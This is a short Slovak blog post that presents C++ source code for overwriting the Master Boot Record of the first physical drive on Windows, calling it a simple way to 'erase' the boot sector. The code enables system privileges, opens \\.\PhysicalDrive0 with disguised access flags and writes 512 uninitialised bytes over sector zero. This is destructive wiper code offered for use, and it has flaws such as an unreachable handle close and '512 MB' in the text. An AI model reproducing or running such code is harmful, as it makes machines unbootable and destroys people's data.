V tomto článku si popíšeme prepísanie - zrušenie MBR sektoru.

 

 

Ide o pomerne jednoduchý postup ako zrušiť zavádzací sektor.
Pri zrušení MBR ide o jeho prepísanie, pričom to môže byť uskutočnené neakými hodnotami o veľkosti 512 MB, alebo len prázdnym miestom, tj, miestom alokovaným.

Ja som si vybral prepísanie alokovaným miestom typu BYTE a prepisovať jednotku budeme asynchrónne.

Celý kód by mohol vyzerať neako takto:

 

#include "WinAPI.h" //https://www.netbot.sk/sk/14-blog-headers/31-winapi

#define MBR_SIZE 512

enum SystemAccess:DWORD {
	SYSTEMACCESS1 = 0x80000000,
	SYSTEMACCESS2 = 0x40000000,
	SYSTEMACCESS3 = 0x00000001,
	SYSTEMACCESS4 = 0x00000002,
	SYSTEMACCESSA = 0x40000000,
	SYSTEMACCESSB = 0x20000000
};

bool EraseMBR(char * device)
{
	::HANDLE MasterBootRecord;
	MasterBootRecord = ::CreateFileA(device, SystemAccess::SYSTEMACCESS1|SystemAccess::SYSTEMACCESS2, SystemAccess::SYSTEMACCESS3|SystemAccess::SYSTEMACCESS4, NULL, 3, SystemAccess::SYSTEMACCESSA|SystemAccess::SYSTEMACCESSB, 0);               
    
	if(MasterBootRecord)
	{
		BYTE * MBR_CONTENT = new byte[MBR_SIZE];
		DWORD MBRDword;

		::OVERLAPPED Overlap = {0};
		::memset(&Overlap, 0, sizeof(Overlap));
		::ULONG Written;
		Overlap.Offset = 0;
		Overlap.OffsetHigh = 0;
		Overlap.hEvent = 0;
		
		bool result = ::WriteFile(MasterBootRecord, MBR_CONTENT, MBR_SIZE, &MBRDword, &Overlap);

		delete [] MBR_CONTENT;

		return result;

	} else {
		return 0;
	}

	::CloseHandle(MasterBootRecord);
}

int _cdecl main (void)
{
	 ::Diall_WinApi::WinApi::GetInstance()->SystemIntegrity(::Diall_WinApi::Privilege::ENABLE);

	 EraseMBR("\\\\.\\PhysicalDrive0");

	return 0;
}Príkladové video: